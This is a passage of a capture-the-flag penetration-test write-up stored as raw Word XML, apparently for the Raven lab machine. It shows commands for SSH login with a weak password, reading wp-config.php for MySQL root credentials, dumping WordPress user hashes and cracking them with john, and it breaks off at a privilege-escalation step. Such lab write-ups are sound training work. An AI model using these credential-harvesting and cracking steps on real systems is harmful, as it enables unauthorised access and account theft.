            <wp:docPr id="1332164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e80297713245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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="09D732C5" w14:textId="5A8D8625">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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98DE0C0">
        <w:rPr/>
        <w:t>Flag 1 was found by traversing directories to the /var/www/html folder at root.  Flag 1 is in service.html file below the footer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="043E7418" w14:textId="6656C453">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="498DE0C0">
        <w:rPr/>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="3F0887C6" w14:textId="65A7B7D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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98DE0C0">
        <w:rPr/>
        <w:t>cd ../</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="3B2DEAB2" w14:textId="3959AD51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="498DE0C0">
        <w:rPr/>
        <w:t>cd ../</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="59C4D4C5" w14:textId="1C945F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="498DE0C0">
        <w:rPr/>
        <w:t>cd var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="7ECE4BB5" w14:textId="5F76AE9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="498DE0C0">
        <w:rPr/>
        <w:t>ls-l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="380ADE0E" w14:textId="72B758FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6E28B93C">
        <w:rPr/>
        <w:t>nano service.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="1FEE99FD" w14:textId="3B2DC9CE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="717527E3" wp14:anchorId="066EEAD8">
            <wp:extent cx="4572000" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="418704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4857d659d341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8DE0C0" w14:paraId="5EA576DE" wp14:textId="1F2EFA8C">
      <w:pPr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- `flag2.txt`: fcfd58dcdad9ab23faca6e9a3e581c</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E28B93C" w14:paraId="55A68AA7" wp14:textId="05FEC0C6">
      <w:pPr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- **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E28B93C" w14:paraId="68A72BB2" wp14:textId="16F7D6B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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Open Port SSH and weak user password: used SSH to get user shell for user Michael (same exploits used in flag1) and traversing through directories and files again.  Flag 2 was found in /var/www.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E28B93C" w14:paraId="15FF5D6B" wp14:textId="34BE5096">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr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Commands: </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="5E44B8AA" wp14:textId="35F1D727">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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proofErr w:type="spellStart"/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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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michael@192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="250ADEF5" wp14:textId="6E92B000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none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u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pw: </w:t>
      </w:r>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="32F920BE" w14:textId="75DDF141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cd ../</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="2C078E63" wp14:textId="55368F22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr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cd /var/www</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="538D48EF" w14:textId="576F3198">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr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ls –l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="7F8B9C44" w14:textId="1D5903EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr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cat flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="3E81E2EB" w14:textId="46546D5A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="5DE32C40" wp14:anchorId="51F67B60">
            <wp:extent cx="4400550" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1399011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4b240828f048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EEB6A8F" wp14:anchorId="447BF862">
            <wp:extent cx="3971925" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="989283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179c9e233d4e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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="74CE0BEF" w14:textId="45D90A71">
      <w:pPr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- `flag3.txt`: afc01ab56591e7dccf93122770cd2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="7501D150" w14:textId="4D3DCB93"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- **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="49324805" w14:textId="7B8C2137">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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MySQL Database Access and Exfiltration </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="66A7654E" w14:textId="03B04049">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0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Continued using Michael shell to find the MySQL database password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="11A2E85B" w14:textId="41575786">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0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Once again traversing directories to /var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/ and searched for wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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file containing MySQL database username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="39BB054A" w14:textId="39A34472">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="5F846C95" w14:textId="5959FAE5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Logged into MySQL database with root:’R@v3nSecurity’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="39D48DD1" w14:textId="0A84407E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr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Flag 3 found in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wp_posts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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table in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="114F1C55" w14:textId="4BE377CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Commands: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="561943C3" w14:textId="28E89A7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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cd /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="5C880271" w14:textId="18936FEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr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ls –l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="1CC07BB8" w14:textId="1BC5E6D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr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cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C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wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C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/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="20834BEC" w14:textId="200C0090">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr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cat wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="486F08EB" w14:textId="7081449F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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uroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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–p’R@v3nSecurity’ -</w:t>
      </w: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hlocalhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="25EEFB03" w14:textId="0095E6F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr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show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="2689C544" w14:textId="1DE77232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr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use </w:t>
      </w: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wordpress</w:t>
      </w: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;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="522439A3" w14:textId="2E29DC25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr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show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="38B3156A" w14:textId="6EA0F88B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr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select *from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wp_posts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="0CC405E7" w14:textId="1A3EBC8C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="351955DA" wp14:anchorId="2B8BB66F">
            <wp:extent cx="4572000" cy="4181475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1254879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06fe3577ef4d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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="10A1A7B9" w14:textId="4C368F4C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="59A1677F" wp14:anchorId="281CEBEF">
            <wp:extent cx="4572000" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="869376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d86625a16d4d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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="787D043D" w14:textId="5726CC29">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="0911EA88" wp14:anchorId="689F69D6">
            <wp:extent cx="4572000" cy="3505200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182695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d27a19ee3249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35052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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="738B86BA" w14:textId="0B1F0DE7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="7170B654" wp14:anchorId="391BFBE4">
            <wp:extent cx="4572000" cy="1428750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="457213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033ff5c2fa45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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="3E67B68E" w14:textId="1E014EEE">
      <w:pPr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- `flag4.txt`: 715dea6c055b9fe3337544932f2941ce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="4F7C3EE4" w14:textId="4D3DCB93"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- **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="573EC069" w14:textId="66DB39CE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1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- Used unsalted password hash and the use of privilege escalation with Python. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="0975B63A" w14:textId="4ECAA0ED">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1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-  Privilege Escalation/Misconfiguration of User Privileges (Python can run with </w:t>
      </w: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sudo</w:t>
      </w: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) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="35B5866B" w14:textId="18F200CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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Retrieve user credentials from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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database stored in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wp_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="2117BF1F" w14:textId="4861CA69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="4CD5CE0E" w14:textId="34A8CDFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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mysql</w:t>
      </w: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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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uroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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–p’R@v3nSecurity’ -hlocalhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="323B566F" w14:textId="481B0CBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">show databases; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="50F5AB43" w14:textId="2405A9AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr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noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="2FB5B967" w14:textId="1DEFFBA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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498DE0C0" w:rsidR="498DE0C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="72D32806" w14:textId="5E0EDF59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0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535848FC" w:rsidR="535848F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select * from </w:t>
      </w:r>
      <w:r w:rsidRPr="535848FC" w:rsidR="535848FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wp_users</w:t>
      </w:r>
      <w:r w:rsidRPr="535848FC" w:rsidR="535848FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; for WordPress user password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="4F719BC7" w14:textId="7AF00AF1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="6C4D5418" wp14:anchorId="236A3786">
            <wp:extent cx="4572000" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="751530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52eb3a67604d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8DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="2AD26E57" w14:textId="68DB848A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind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Used john to crack the password hash found in MySQL database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="64DBE603" w14:textId="76767677">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr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Copied the password hash from MySQL into ~/root/wp_hashes.txt and cracked with john to discover Steven’s password is pink84.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="30CE1CC1" w14:textId="2FC64739">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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  - Commands: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="52C0B895" w14:textId="7E1D8ADA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr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john </w:t>
      </w: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wp_hashes</w:t>
      </w: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.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="6BE984B9" w14:textId="58DEB131">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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u w:val="none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u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>show john –show wp_hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="2DEA2E52" w14:textId="48D325D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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u w:val="none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u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secure a user shell as the user Steven whose password was cracked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E28B93C" w:rsidP="6E28B93C" w:rsidRDefault="6E28B93C" w14:paraId="52A10D00" w14:textId="72C91723">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
